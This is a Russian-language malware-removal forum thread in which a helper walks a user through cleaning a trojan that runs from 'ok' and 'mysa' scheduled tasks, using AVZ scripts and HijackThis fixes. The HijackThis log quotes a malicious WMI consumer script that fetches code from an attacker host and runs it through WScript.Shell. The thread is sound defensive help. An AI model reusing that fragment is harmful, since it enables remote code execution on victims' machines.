Планировщик заданий и файлы ok,mysa

[Raptyle83]

Здравствуйте! Сегодня в планировщике заданий обнаружил процесс "ok"
rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Погуглил - оказалось, что троян!
Затем нашёл В папке C:\Windows\System32\Tasks файл "ok" (с замочком)
Почитал отзывы и обнаружил:
В реестре в ветке
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\
нашёл
{58B55F42-754F-4456-9F58-177C34CD2478} path \ok
{A3ECD9C8-4A15-497E-94A2-6F668B2AF398} path \mysa
и в ветке
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree
нашёл папки ok и mysa
Помогите! Можно ли просто удалив все эти задания, файлы и папки (как некоторые советчики в интернете) избавить компьютер от трояна?

[Info_bot]

Уважаемый(ая) Raptyle83, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Raptyle83]

Также скачал патч против WannaCry, но не установил. Думаю, его надо устанавливать на чистый комп. (шифровальщик наверное успел пролезть до того, как закрыть уязвимость) Правильно делаю?

[Raptyle83]

В похожей теме, увидел совет - выполнить скрипт в AVZ:
begin
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Micr osoft\Windows\CurrentVersion\Run','start1');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Micr osoft\Windows\CurrentVersion\Run','start');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64') ;
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64') ;
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
ExecuteSysClean;
RebootWindows(false);
end.
Подойдёт ли данный способ для моей системы?

[Vvvyg]

Скрипты делаются индивидуально, чужие могут быть бесполезны или повредить систему.

Выполните скрипт в AVZ:

Код:

begin
 ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
 DeleteFile('c:\windows\debug\ok.dat', '32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

R3 - HKCU\..\URLSearchHooks: (no name) - {83821C2B-32A8-4DD7-B6D4-44309A78E668} - (no file)
R3 - HKCU\..\URLSearchHooks: (no name) - {eb464721-c571-4123-ae62-d0576af38750} - (no file)
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0709.xyz:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");fo(1727 bytes)

Устраняйте уязвимость, которую используют в т. ч. нашумевшие в прошлом году шифровальщики WannaCry и Petya, критическое обновление cкачайте для своей системы по ссылке отсюда:
http://www.catalog.update.microsoft....px?q=KB4012212
Иначе не избавитесь от заразы.

Удалите Java(TM) 7 Update 25, это устаревшая версия со множеством критических уязвимостей.
Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8.
Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.

Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8.
Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.

[Raptyle83]

Огромное спасибо за помощь!!! По возможности поддержу проект.
А можно скачать патч закрытия уязвимости отсюда:
https://www.kaspersky.ru/blog/wannac...-update/17543/

[Vvvyg]

Там прямые ссылки на сайт Microsoft, можно.

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.